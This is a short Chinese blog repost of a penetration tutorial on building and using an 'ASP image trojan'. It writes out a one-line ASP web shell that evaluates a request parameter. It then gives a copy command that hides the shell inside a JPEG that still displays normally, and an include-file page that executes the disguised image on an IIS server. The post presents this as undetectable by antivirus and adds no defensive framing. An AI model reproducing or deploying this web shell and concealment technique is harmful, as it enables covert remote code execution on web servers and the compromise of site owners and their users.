渗透之——asp图片木马的制作和使用
生活随笔
收集整理的這篇文章主要介紹了
渗透之——asp图片木马的制作和使用
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
轉(zhuǎn)載請注明出處:https://blog.csdn.net/l1028386804/article/details/84959588
主要亮點:圖片木馬(可以正常打開顯示的木馬)
先看代碼:
僅需幾步:圖片和一句話木馬合并,制作可以正常顯示的圖片木馬。
1、找一張圖片,名字改成1.jpg
2、<%eval request(“a”)%>存為1.asp(就是一句話木馬)
3、copy 1.jpg /b + 1.asp /a asp.jpg 存為1.bat文件
注:以上三個文件放在同一目錄里面
復制當前目錄下的1.jpg圖片和當前目錄下的1.asp文件并以ASCII代碼的方式合并為 asp.jpg圖片,運行1.bat,就會出現(xiàn)一個圖片asp.jpg,現(xiàn)在這個asp.jpg就是已經(jīng)做好的木馬了。
這個圖片外表很正常,用縮略圖也看不出任何破綻,但是卻非常的危險,讓人防不勝防。
利用方法:新建一個asp.asp 內(nèi)容為:
<!–#include file=”asp.jpg”–>
把asp.jpg 和 asp.asp 放在同一目錄,然后訪問: asp.asp?? 用這種方法,任何殺毒是搜不到的
總結
以上是生活随笔為你收集整理的渗透之——asp图片木马的制作和使用的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Angular实战项目(1)
- 下一篇: 包,内部类,常用类,集合